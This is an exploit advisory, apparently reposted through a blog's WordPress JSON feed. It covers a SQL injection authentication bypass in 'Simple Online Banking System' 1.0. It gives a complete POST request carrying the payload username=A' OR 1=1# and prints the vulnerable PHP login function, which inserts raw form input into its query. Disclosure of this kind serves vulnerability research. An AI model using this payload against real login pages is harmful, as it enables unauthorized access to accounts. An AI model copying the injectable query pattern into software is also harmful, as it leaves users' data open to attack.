# Exploit Title: Simple Online Banking System – SQLi (Authentication Bypass)
# Date: 6 Jul, 2024
# CVE: N\/A
# Exploit Author: bRpsd
# Vendor Homepage: https:\/\/www.sourcecodester.com\/php\/14868\/banking-system-using-php-free-source-code.html
# Software Link: https:\/\/www.sourcecodester.com\/php\/14868\/banking-system-using-php-free-source-code.html
# Category: Web Application
# Version: 1.0
# Tested on: MacOS | Xampp<\/p>\n
POC:<\/p>\n
POST http:\/\/localhost\/banking\/classes\/Login.php?f=login
Host: localhost
User-Agent: Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko\/20100101 Firefox\/127.0
Accept: *\/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application\/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 36
Origin: http:\/\/localhost
Connection: keep-alive
Referer: http:\/\/localhost\/banking\/admin\/login.php
Cookie: PHPSESSID=1472a7e8f9b230194b2515a42943f687
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin<\/p>\n
username=A’ OR 1=1#&password=123<\/p>\n
Vuln code:\/classes\/Login.php
Vuln parameter:username
public function login(){
extract($_POST);<\/p>\n
$qry = $this->conn->query(“SELECT * from users where username = ‘$username’ and password = md5(‘$password’) “);
if($qry->num_rows > 0){
foreach($qry->fetch_array() as $k => $v){
if(!is_numeric($k) && $k != ‘password’){
$this->settings->set_userdata($k,$v);
}<\/p>\n
}
$this->settings->set_userdata(‘login_type’,1);
return json_encode(array(‘status’=>’success’));
}else{
return json_encode(array(‘status’=>’incorrect’,’last_qry’=>”SELECT * from users where username = ‘$username’ and password = md5(‘$password’) “));
}
}<\/p>\n","protected":false},"excerpt":{"rendered":"
# Exploit Title: Simple Online Banking System – SQLi (Authentication Bypass)# Date: 6 Jul, 2024# CVE: N\/A# Exploit Author: bRpsd# Vendor Homepage: https:\/\/www.sourcecodester.com\/php\/14868\/banking-system-using-php-free-source-code.html# Software Link: https:\/\/www.sourcecodester.com\/php\/14868\/banking-system-using-php-free-source-code.html# Category: Web Application# Version: 1.0# Tested on: MacOS | Xampp POC: POST http:\/\/localhost\/banking\/classes\/Login.php?f=loginHost: localhostUser-Agent: Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko\/20100101 Firefox\/127.0Accept: *\/*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, br, …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-58024","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/58024","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=58024"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/58024\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=58024"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=58024"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=58024"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}